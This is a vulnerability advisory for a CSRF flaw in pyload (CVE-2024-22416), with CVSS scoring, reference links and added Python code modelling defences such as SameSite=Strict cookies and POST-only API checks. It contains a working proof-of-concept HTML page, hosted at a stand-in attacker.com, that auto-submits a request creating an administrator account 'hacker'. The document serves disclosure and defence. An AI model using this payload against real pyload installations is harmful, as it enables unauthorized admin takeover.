CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
AI Score
Confidence: High
EPSS Percentile: 29.5%
The pyload API allows any API call to be made using GET requests. Since the session cookie is not set with the SameSite=Strict attribute, this opens the application up to severe attack possibilities via Cross-Site Request Forgery (CSRF). This proof of concept shows how an unauthenticated user could trick the administrator’s browser into creating a new admin user.
We host the following HTML file on an attacker-controlled server.
<html>
<body>
<form action="http://localhost:8000/api/add_user/%22hacker%22,%22hacker%22">
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
If we now trick an administrator into visiting our malicious page at https://attacker.com/CSRF.html, we see that their browser will make a request to /api/add_user/%22hacker%22,%22hacker%22, adding a new administrator to the pyload application.
The attacker can now authenticate as this newly created administrator user with the username hacker and password hacker.
Any API call can be made via a CSRF attack by an unauthenticated user.
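The two defences this advisory implies, modelled as an added example that is not pyload's own code: a session cookie that browsers withhold from cross-site requests, and a server-side gate that refuses API calls over GET and from foreign origins. The cookie name pyload_session and the allowed origin are assumptions chosen for the example; the browser rule is simplified.

```python
# Added example (not pyload's code): defences against the CSRF pattern in
# CVE-2024-22416. Cookie name and allowed origin are assumptions.
from http.cookies import SimpleCookie

ALLOWED_ORIGIN = "http://localhost:8000"   # origin targeted by the PoC above
SESSION_COOKIE = "pyload_session"          # hypothetical cookie name


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value carrying SameSite=Strict, HttpOnly and Secure."""
    c = SimpleCookie()
    c[SESSION_COOKIE] = session_id
    m = c[SESSION_COOKIE]
    m["samesite"] = "Strict"
    m["httponly"] = True
    m["secure"] = True
    m["path"] = "/"
    return m.OutputString()


def cookie_sent_cross_site(samesite: str, top_level: bool, method: str) -> bool:
    """Simplified browser rule: is a cookie with this SameSite value attached
    to a request that another site initiated? The PoC is a top-level GET
    navigation, so Lax alone would still send the cookie; Strict would not."""
    s = samesite.lower()
    if s == "strict":
        return False
    if s == "lax":
        return top_level and method.upper() == "GET"
    return True  # SameSite=None (or no attribute on an older browser)


def api_request_allowed(method: str, path: str, headers: dict) -> tuple:
    """Server-side gate for /api/ calls; returns (allowed, reason).
    Header names are matched case-insensitively."""
    h = {k.lower(): v for k, v in headers.items()}
    if not path.startswith("/api/"):
        return True, "not an API call"
    if method.upper() != "POST":
        return False, "API calls must use POST, not GET"
    site = h.get("sec-fetch-site")  # browsers set this on cross-site requests
    if site not in (None, "same-origin", "none"):
        return False, "cross-site request rejected (Sec-Fetch-Site=%s)" % site
    origin = h.get("origin")
    if origin is not None and origin != ALLOWED_ORIGIN:
        return False, "origin %s not allowed" % origin
    return True, "ok"
```

Requiring POST is what actually stops the GET-based PoC on the server side; the cookie attribute keeps the admin session out of any cross-site request the browser makes.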
github.com/pyload/pyload
github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e
github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc
github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm
github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-17.yaml
nvd.nist.gov/vuln/detail/CVE-2024-22416